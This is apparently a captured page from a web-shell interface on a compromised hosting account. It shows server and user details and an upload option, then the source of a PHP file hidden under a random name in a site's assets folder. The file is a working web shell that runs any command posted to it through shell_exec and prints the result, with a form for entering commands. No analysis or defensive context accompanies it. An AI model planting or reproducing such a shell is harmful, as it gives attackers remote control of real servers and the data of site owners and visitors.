HEX
Server: Apache
System: Linux webm017.cluster129.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User: exothed (351186)
PHP: 7.4.33
Disabled: _dyuweyrj4,_dyuweyrj4r,dl
Upload Files
File: /home/e/x/o/exothed/www/assets/trAvis_ZUHn42c4.php
<?php
if(isset($_POST['cmd'])) {
    $output = shell_exec($_POST['cmd']);
    echo "<pre>$output</pre>";
}
?>
<form method="post">
    <input type="text" name="cmd" placeholder="Enter command" style="width: 300px;">
    <input type="submit" value="Execute">
</form>